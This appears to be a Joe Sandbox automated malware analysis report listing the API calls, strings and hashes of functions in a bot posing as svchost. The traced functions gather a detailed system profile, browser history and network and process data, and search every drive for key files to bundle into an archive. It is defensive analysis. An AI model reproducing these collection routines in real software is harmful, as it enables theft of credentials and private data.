Function 02D06CA4 Relevance: 6.1, APIs: 4, Instructions: 53threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,02D06870,00000000,00000000,00000000), ref: 02D06C6E
WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,-80000001), ref: 02D06C9A
GetHandleInformation.KERNEL32(?,00000000), ref: 02D06CC7
CloseHandle.KERNEL32(?), ref: 02D06CD8

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$CloseCreateInformationMultipleObjectsThreadWait
String ID:
API String ID: 3242810915-0
Opcode ID: db16ffa699dd9afd628d1ae0eb5d3e24658d936e017987c53fec76e19de117fd
Instruction ID: fb252e883530201f37667570192f81a692c84cab5e35e2e22ee743362f3a00cf
Opcode Fuzzy Hash: db16ffa699dd9afd628d1ae0eb5d3e24658d936e017987c53fec76e19de117fd
Instruction Fuzzy Hash: 6411C4B4D40214ABEB218F909CC57AD7BADEB04B04F604524EA46663E0CB70DDB1C7EE

Function 02D17220 Relevance: 6.0, APIs: 4, Instructions: 27threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,02D167D0,00000000,00000000,00000000), ref: 02D17234
GetHandleInformation.KERNEL32(00000000,?), ref: 02D1724C
FindCloseChangeNotification.KERNEL32(00000000), ref: 02D1725D
ExitThread.KERNEL32 ref: 02D17265

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Thread$ChangeCloseCreateExitFindHandleInformationNotification
String ID:
API String ID: 3889709574-0
Opcode ID: 208a5ece320ab7a5bdaf0bded75fe426dfc42c4fd4bbd0f5bba12ac26f35df6d
Instruction ID: 9458c57bdc9cf5c3c21739acb963ac40e785af4a4935fc666f0007510fc44a4f
Opcode Fuzzy Hash: 208a5ece320ab7a5bdaf0bded75fe426dfc42c4fd4bbd0f5bba12ac26f35df6d
Instruction Fuzzy Hash: 4FE06D34E85314BBF3214E90BC4EF5E7BE8AF01B45F644441FE01A6BC1D7A0AE00C6A4

Function 0040217A Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000), ref: 0040218C

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: b7cbe1c8c54e898400676a98b1d5ddb11bfceec092903a2200cc263d8e9133b1
Instruction ID: d0e749ada70b16f267b0096a5882ad0ed8cb575b22d8ef64c6acb779e6c27845
Opcode Fuzzy Hash: b7cbe1c8c54e898400676a98b1d5ddb11bfceec092903a2200cc263d8e9133b1
Instruction Fuzzy Hash: B6D05E76E05729CBCB20DF94A5052AEF730FB45731F0083AADE247338083351C118AD4

Non-executed Functions

Function 02D048C0 Relevance: 325.1, APIs: 164, Strings: 21, Instructions: 1339filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,02D5D3A4,74E15CE0), ref: 02D049F4
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?), ref: 02D04A14
LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02D04A25
WriteFile.KERNEL32(00000000,{BotVer: ,00000009,?,00000000), ref: 02D04A35
UnlockFile.KERNEL32(00000000,?,00000000,00000009,00000000), ref: 02D04A46
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D04A5A
LockFile.KERNEL32(00000000,00000000,00000000,00000005,00000000), ref: 02D04A67
WriteFile.KERNEL32(00000000,4.2.5,00000005,00000000,00000000), ref: 02D04A77
UnlockFile.KERNEL32(00000000,?,00000000,00000005,00000000), ref: 02D04A88
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D04A9C
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D04AA9
WriteFile.KERNEL32(00000000,02D45A7C,00000002,00000000,00000000), ref: 02D04AB9
UnlockFile.KERNEL32(00000000,?,00000000,00000002,00000000), ref: 02D04ACA
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D04ADE
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D04AF2
LockFile.KERNEL32(00000000,00000000,00000000,0000000A,00000000), ref: 02D04AFF
WriteFile.KERNEL32(00000000,{Process: ,0000000A,00000000,00000000), ref: 02D04B0F
UnlockFile.KERNEL32(00000000,?,00000000,0000000A,00000000), ref: 02D04B20
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D04B4C
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D04B5B
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D04B6F
UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02D04B82
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D04B96
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D04BA3
WriteFile.KERNEL32(00000000,02D45A7C,00000002,00000000,00000000), ref: 02D04BB3
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D04BC4
GetUserNameA.ADVAPI32(?,00000104), ref: 02D04BD5
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D04BE9
LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02D04BF6
WriteFile.KERNEL32(00000000,{Username: ,0000000B,00000000,00000000), ref: 02D04C06
UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02D04C17
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D04C42
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D04C51
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D04C65
UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D04C78
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D04C8C
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D04C99
WriteFile.KERNEL32(00000000,02D45A7C,00000002,00000000,00000000), ref: 02D04CA9
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D04CBA
GetEnvironmentVariableA.KERNEL32(PROCESSOR_IDENTIFIER,?,00000104), ref: 02D04CD1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D04CE5
LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02D04CF2
WriteFile.KERNEL32(00000000,{Processor: ,0000000C,00000000,00000000), ref: 02D04D02
UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02D04D13
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D04D3E
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D04D4D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D04D61
UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D04D74
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D04D88
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D04D95
WriteFile.KERNEL32(00000000,02D45A7C,00000002,00000000,00000000), ref: 02D04DA5
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D04DB6
GetSystemDefaultLangID.KERNEL32 ref: 02D04DBC
memset.MSVCRT ref: 02D04DD6
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D04E43
LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02D04E50
WriteFile.KERNEL32(00000000,{Language: ,0000000B,00000000,00000000), ref: 02D04E60
UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02D04E71
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D04E9C
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D04EAB
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D04EBF
UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D04ED2
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D04EE6
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D04EF3
WriteFile.KERNEL32(00000000,02D45A7C,00000002,00000000,00000000), ref: 02D04F03
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D04F14
GetDC.USER32(00000000), ref: 02D04F1E
GetDeviceCaps.GDI32(00000000), ref: 02D04F25
GetSystemMetrics.USER32(00000001), ref: 02D04F2E
GetSystemMetrics.USER32(00000000), ref: 02D04F37
_snprintf.MSVCRT ref: 02D04F4F
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D04F66
LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02D04F73
WriteFile.KERNEL32(00000000,{Screen: ,00000009,00000000,00000000), ref: 02D04F83
UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02D04F94
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D04FBF
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D04FCE
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D04FE2
UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D04FF5
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D05009
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D05016
WriteFile.KERNEL32(00000000,02D45A7C,00000002,00000000,00000000), ref: 02D05026
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D05037
GetDateFormatA.KERNEL32(00000409,00000000,00000000,dd:MMM:yyyy,?,00000104), ref: 02D05057
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D0506B
LockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 02D05078
WriteFile.KERNEL32(00000000,{Date: ,00000007,00000000,00000000), ref: 02D05088
UnlockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 02D05099
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D050C4
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D050D3
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D050E7
UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D050FA
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D0510E
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D0511B
WriteFile.KERNEL32(00000000,02D45A7C,00000002,00000000,00000000), ref: 02D0512B
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D0513C
GetTimeFormatA.KERNEL32(00000409,00000000,00000000,HH:mm:ss,?,00000104), ref: 02D0515C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D05170
LockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 02D0517D
WriteFile.KERNEL32(00000000,{Local time: ,0000000D,00000000,00000000), ref: 02D0518D
UnlockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 02D0519E
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D051CC
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D051DB
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D051EF
UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D05202
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D05216
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D05223
WriteFile.KERNEL32(00000000,02D45A7C,00000002,00000000,00000000), ref: 02D05233
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D05244
GetTimeZoneInformation.KERNEL32(?), ref: 02D05251
_snprintf.MSVCRT ref: 02D052B2
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D052C9
LockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 02D052D6
WriteFile.KERNEL32(00000000,{GMT: ,00000006,00000000,00000000), ref: 02D052E6
UnlockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 02D052F7
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D05322
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D05331
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D05345
UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D05358
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D0536C
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D05379
WriteFile.KERNEL32(00000000,02D45A7C,00000002,00000000,00000000), ref: 02D05389
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D0539A
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D053AE
LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02D053BB
WriteFile.KERNEL32(00000000,{Uptime: ,00000009,00000000,00000000), ref: 02D053CB
UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02D053DC
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D0541C
LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02D0542B
WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02D0543C
UnlockFile.KERNEL32(00000000,02D03CCD,00000000,00000000,00000000), ref: 02D0544F
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D05463
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D05470
WriteFile.KERNEL32(00000000,02D45A7C,00000002,00000000,00000000), ref: 02D05480
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D05491
GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02D054A3
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D054B7
LockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 02D054C4
WriteFile.KERNEL32(00000000,{Windows directory: ,00000014,00000000,00000000), ref: 02D054D4
UnlockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 02D054E5
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D05510
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D0551F
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D05533
UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D05546
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D0555A
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D05567
WriteFile.KERNEL32(00000000,02D45A7C,00000002,00000000,00000000), ref: 02D05577
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D05588
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D0559C
LockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 02D055A9
WriteFile.KERNEL32(00000000,{Administrator: ,00000010,00000000,00000000), ref: 02D055B9
UnlockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 02D055CA
IsUserAnAdmin.SHELL32 ref: 02D055D0
IsUserAnAdmin.SHELL32 ref: 02D055F3
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D05625
LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02D05634
WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02D05645
UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02D05658
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D0566C
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D05678
WriteFile.KERNEL32(00000000,02D45A7C,00000002,00000000,00000000), ref: 02D05688
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D05696

Part of subcall function 02D046C0: RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 02D046E5
Part of subcall function 02D046C0: _snprintf.MSVCRT ref: 02D0470D
Part of subcall function 02D046C0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,75923490), ref: 02D04747
Part of subcall function 02D046C0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D04769
Part of subcall function 02D046C0: LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02D04775
Part of subcall function 02D046C0: WriteFile.KERNEL32(00000000,IE history:,0000000C,02D056A1,00000000), ref: 02D04789
Part of subcall function 02D046C0: UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02D04797
Part of subcall function 02D046C0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D047AB
Part of subcall function 02D046C0: LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02D047B7
Part of subcall function 02D046C0: WriteFile.KERNEL32(00000000,02D45B10,00000001,00000000,00000000), ref: 02D047CB
Part of subcall function 02D046C0: UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02D047D9

Part of subcall function 02D03F40: GetProcessHeap.KERNEL32(00000008,00000C10,00000000,00000000,75923490), ref: 02D03F5D
Part of subcall function 02D03F40: HeapAlloc.KERNEL32(00000000), ref: 02D03F60
Part of subcall function 02D03F40: memset.MSVCRT ref: 02D03F74
Part of subcall function 02D03F40: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02D03FE4
Part of subcall function 02D03F40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D03FF2
Part of subcall function 02D03F40: HeapValidate.KERNEL32(00000000), ref: 02D03FF5
Part of subcall function 02D03F40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D04002
Part of subcall function 02D03F40: HeapFree.KERNEL32(00000000), ref: 02D04005
Part of subcall function 02D03F40: GetProcessHeap.KERNEL32(00000008,00000BED), ref: 02D0401D
Part of subcall function 02D03F40: HeapAlloc.KERNEL32(00000000), ref: 02D04020
Part of subcall function 02D03F40: memset.MSVCRT ref: 02D04030
Part of subcall function 02D03F40: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02D0404A
Part of subcall function 02D03F40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D04057
Part of subcall function 02D03F40: HeapValidate.KERNEL32(00000000), ref: 02D0405A
Part of subcall function 02D03F40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D0406B
Part of subcall function 02D03F40: HeapFree.KERNEL32(00000000), ref: 02D0406E

Part of subcall function 02D04290: memset.MSVCRT ref: 02D042C3
Part of subcall function 02D04290: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D042CE
Part of subcall function 02D04290: Process32First.KERNEL32 ref: 02D042F1
Part of subcall function 02D04290: GetHandleInformation.KERNEL32(00000000,?), ref: 02D0430D
Part of subcall function 02D04290: CloseHandle.KERNEL32(00000000), ref: 02D04327

Part of subcall function 02D044D0: NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,00000000,00000000,00000000,00000000,75923490,?,?,?,?,02D056B3,00000000), ref: 02D0451A
Part of subcall function 02D044D0: GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,?,02D056B3,00000000,00000000,00000000), ref: 02D04565
Part of subcall function 02D044D0: HeapAlloc.KERNEL32(00000000,?,?,?,?,02D056B3,00000000,00000000,00000000), ref: 02D0456C
Part of subcall function 02D044D0: memset.MSVCRT ref: 02D0457F
Part of subcall function 02D044D0: _snprintf.MSVCRT ref: 02D045CA

GetHandleInformation.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D056C4
CloseHandle.KERNEL32(00000000), ref: 02D056D5

Strings

4.2.5, xrefs: 02D04A71
{Windows directory: , xrefs: 02D054CE
true, xrefs: 02D055D8, 02D055F9
{Screen: , xrefs: 02D04F7D
HH:mm:ss, xrefs: 02D0514E
dd:MMM:yyyy, xrefs: 02D05049
{Local time: , xrefs: 02D05187
{Uptime: , xrefs: 02D053C5
{Process: , xrefs: 02D04B09
%dx%d@%d, xrefs: 02D04F3E
{Language: , xrefs: 02D04E5A
false, xrefs: 02D055DF, 02D05604
PROCESSOR_IDENTIFIER, xrefs: 02D04CCC
{BotVer: , xrefs: 02D04A2F
{Date: , xrefs: 02D05082
{Administrator: , xrefs: 02D055B3
{Processor: , xrefs: 02D04CFC
{Username: , xrefs: 02D04C00
XXX, xrefs: 02D04E77
%c%d:%02d, xrefs: 02D052A7
{GMT: , xrefs: 02D052E0

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: File$LockPointerUnlockWrite$Heap$Process$memset$HandleInformationSystem_snprintf$AllocUser$AdminCloseCreateFormatFreeMetricsNameQueryTableTimeValidate$CapsDateDefaultDeviceDirectoryDisplayEnvironmentFirstLangModuleOpenProcess32SnapshotToolhelp32ValueVariableWindowsZone
String ID: %c%d:%02d$%dx%d@%d$4.2.5$HH:mm:ss$PROCESSOR_IDENTIFIER$XXX$dd:MMM:yyyy$false$true${Administrator: ${BotVer: ${Date: ${GMT: ${Language: ${Local time: ${Process: ${Processor: ${Screen: ${Uptime: ${Username: ${Windows directory:
API String ID: 58573281-2909121063
Opcode ID: 3a73c53f9ecdfaa1266d9baebdd8a2d50388972b3012bc2bec64252897add4f6
Instruction ID: a3245e5e785a2825df973eee08853598f8e58677edb751119df45f8df1a94e82
Opcode Fuzzy Hash: 3a73c53f9ecdfaa1266d9baebdd8a2d50388972b3012bc2bec64252897add4f6
Instruction Fuzzy Hash: 9EA20174A91218BFFB209F90DC8AFEE77B8AF45B04F508545B701BA2C0D7F46A448B65

Function 02D1D060 Relevance: 195.1, APIs: 94, Strings: 17, Instructions: 833COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D1D080
memset.MSVCRT ref: 02D1D09D
SetErrorMode.KERNEL32(00000001,?,?,?,?,74E17390,?), ref: 02D1D0AD
GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02D1D0BC
SetErrorMode.KERNEL32(00000001,?,?,?,?,74E17390,?), ref: 02D1D0D3
GetDriveTypeA.KERNEL32(?,?,?,?,?,74E17390,?), ref: 02D1D0EC
SetCurrentDirectoryA.KERNEL32(?,?,?,?,?,74E17390,?), ref: 02D1D122
GetFileAttributesA.KERNEL32(header.key,?,?,?,?,74E17390,?), ref: 02D1D135
PathAddBackslashA.SHLWAPI(5C590552,?,?,?,?,74E17390,?), ref: 02D1D164
CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,74E17390,?), ref: 02D1D1A4
GetLastError.KERNEL32(?,?,?,?,74E17390,?), ref: 02D1D1AA
IsUserAnAdmin.SHELL32 ref: 02D1D1B2
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D1D1C1
SetLastError.KERNEL32(00000000,?,?,?,?,74E17390,?), ref: 02D1D1C8
CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,74E17390,?), ref: 02D1D1FE
GetLastError.KERNEL32(?,?,?,?,74E17390,?), ref: 02D1D204
IsUserAnAdmin.SHELL32 ref: 02D1D20C
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D1D21B
SetLastError.KERNEL32(00000000,?,?,?,?,74E17390,?), ref: 02D1D222
SetErrorMode.KERNEL32(?), ref: 02D1DAB0

Strings

masks2.key, xrefs: 02D1D269, 02D1D389
\primary.key, xrefs: 02D1D848
5C590552, xrefs: 02D1D15F, 02D1D16A, 02D1D28F, 02D1D29A, 02D1D3BF, 02D1D3CA, 02D1D4FF, 02D1D50A, 02D1D630, 02D1D63B, 02D1D76F, 02D1D77A, 02D1D89F, 02D1D8AA, 02D1D952, 02D1D95D, 02D1D9F1, 02D1D9FC
\primary2.key, xrefs: 02D1D708
header.key, xrefs: 02D1D130, 02D1D256
\masks2.key, xrefs: 02D1D368
primary.key, xrefs: 02D1D744, 02D1D86F
\header.key, xrefs: 02D1D238
\name.key, xrefs: 02D1D5D8
primary2.key, xrefs: 02D1D60B, 02D1D730
\masks.key, xrefs: 02D1D498
keys99.zip, xrefs: 02D1D919
keys99, xrefs: 02D1D1DB, 02D1D30B, 02D1D43B, 02D1D57B, 02D1D6AC, 02D1D7EB, 02D1D99D
name.key, xrefs: 02D1D4D4, 02D1D5F7
\t, xrefs: 02D1D164, 02D1D294, 02D1D3C4, 02D1D504, 02D1D635, 02D1D774, 02D1D8A4, 02D1D957, 02D1D9F6
path99.txt, xrefs: 02D1DA38
masks.key, xrefs: 02D1D399, 02D1D4C4

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Error$Last$DirectoryModePath$AdminCreateDriveFolderMakeSystemUsermemset$AttributesBackslashCurrentFileLogicalStringsType
String ID: 5C590552$\header.key$\masks.key$\masks2.key$\name.key$\primary.key$\primary2.key$header.key$keys99$keys99.zip$masks.key$masks2.key$name.key$path99.txt$primary.key$primary2.key$\t
API String ID: 857499637-2285617392
Opcode ID: 699db779b7f40510c8bb3706221f0729e0b5e021ee3e114dfe896db5b277da99
Instruction ID: e23cadc0660f6a494a99547dfff2df958cc72cb24ac3d5b21bcaa2f7498935dc
Opcode Fuzzy Hash: 699db779b7f40510c8bb3706221f0729e0b5e021ee3e114dfe896db5b277da99
Instruction Fuzzy Hash: B5623438988346AFC711CF74F468AAA7BE6EF99704F548958E882C7301EB70DC48C791

Function 02D0BA40 Relevance: 179.0, APIs: 63, Strings: 39, Instructions: 494libraryloaderfileCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 02D0BA57
GetCurrentProcessId.KERNEL32 ref: 02D0BA62

Part of subcall function 02D0D7A0: GetComputerNameA.KERNEL32(02D4F588,?), ref: 02D0D7B7
Part of subcall function 02D0D7A0: lstrlenA.KERNEL32(02D4F588,?,?,?,02D1714F), ref: 02D0D7C2
Part of subcall function 02D0D7A0: wsprintfA.USER32 ref: 02D0D802
Part of subcall function 02D0D7A0: wsprintfA.USER32 ref: 02D0D812
Part of subcall function 02D0D7A0: wsprintfA.USER32 ref: 02D0D822
Part of subcall function 02D0D7A0: wsprintfA.USER32 ref: 02D0D82F
Part of subcall function 02D0D7A0: wsprintfA.USER32 ref: 02D0D83C

RegisterWindowMessageA.USER32(a3b7feb4a), ref: 02D0BA77
OpenFileMappingA.KERNEL32(000F001F,00000000,02D4F5A0), ref: 02D0BAA0
OpenMutexA.KERNEL32(001F0001,00000000,02D4F670), ref: 02D0BAB3
OpenMutexA.KERNEL32(001F0001,00000000,02D4F630), ref: 02D0BACA
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02D0BAE6
Sleep.KERNEL32(000000C8), ref: 02D0BAF6
GetCurrentThreadId.KERNEL32 ref: 02D0BAFE
GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02D0BB17
GetUserObjectInformationA.USER32(00000000), ref: 02D0BB1E
lstrcmpiA.KERNEL32(?,a3b7feb4a), ref: 02D0BB34
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D0BB60
OpenFileMappingA.KERNEL32(000F001F,00000000,02D4F54C), ref: 02D0BB6E
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02D0BB81
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D0BBB8
CloseHandle.KERNEL32(?), ref: 02D0BBCC
Sleep.KERNEL32(000000C8), ref: 02D0BBD7
